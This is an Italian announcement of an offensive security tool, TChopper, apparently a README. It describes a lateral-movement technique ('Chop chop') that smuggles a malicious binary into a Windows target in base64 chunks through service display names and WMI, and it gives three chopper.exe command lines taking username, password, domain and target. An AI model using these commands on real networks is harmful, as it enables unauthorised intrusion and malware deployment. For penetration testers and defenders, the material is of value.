
condurre un attacco di movimento laterale sfruttando il nome visualizzato dei servizi non filtrati per introdurre furtivamente binari come blocchi nella macchina target
Nuova tecnica che ho scoperto recentemente e a cui ho dato un soprannome (Chop chop) per eseguire movimenti laterali utilizzando il nome visualizzato dei servizi Windows e WMI, contrabbandando il binario malevolo come chunk di base64 e automatizzando il processo tramite lo strumento TChopper.
image
mentre se stai effettuando un movimento laterale utilizzando la tecnica WMI, puoi anche usare Chopper per farlo
image
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
creo strumenti offsec per la comunità open-source, mostra il tuo supporto https://paypal.me/0xsp